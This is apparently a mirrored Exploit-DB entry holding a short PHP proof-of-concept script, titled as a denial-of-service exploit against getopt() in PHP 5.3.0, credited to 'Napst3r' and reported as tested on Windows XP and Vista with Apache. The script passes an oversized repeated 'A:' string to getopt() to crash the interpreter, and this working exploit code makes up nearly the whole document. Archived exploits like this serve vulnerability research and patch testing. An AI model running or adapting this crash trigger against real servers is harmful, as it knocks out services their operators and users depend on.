exploit-db-mirror/exploits/multiple/dos/12165.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

13 lines
No EOL
411 B
Text

<?php
#####################################################################
## PHP 5.3.0 getopt() Denial of service
## Tested on WIN XP FR SP3, WIN VISTA FR SP2, Apache, PHP 5.3.0
## Denial of service
## Author: Napst3r
## Greets To: My Laptop & all My Friends
#####################################################################
$buffer = str_repeat('A:', 9999);
$options = getopt($buffer);
?>